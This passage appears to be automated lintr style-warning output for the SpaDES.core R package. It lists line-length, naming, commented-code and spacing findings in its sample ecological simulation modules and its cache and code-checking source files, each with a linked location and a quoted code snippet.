^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:365:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L365) *style:* **Commented code should be removed.**\n```r\n​            #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:380:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L380) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:384:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L384) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:385:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L385) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:386:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L386) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:425:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L425) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:448:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L448) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:540:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L540) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:567:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L567) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:575:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/cache.R#L575) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            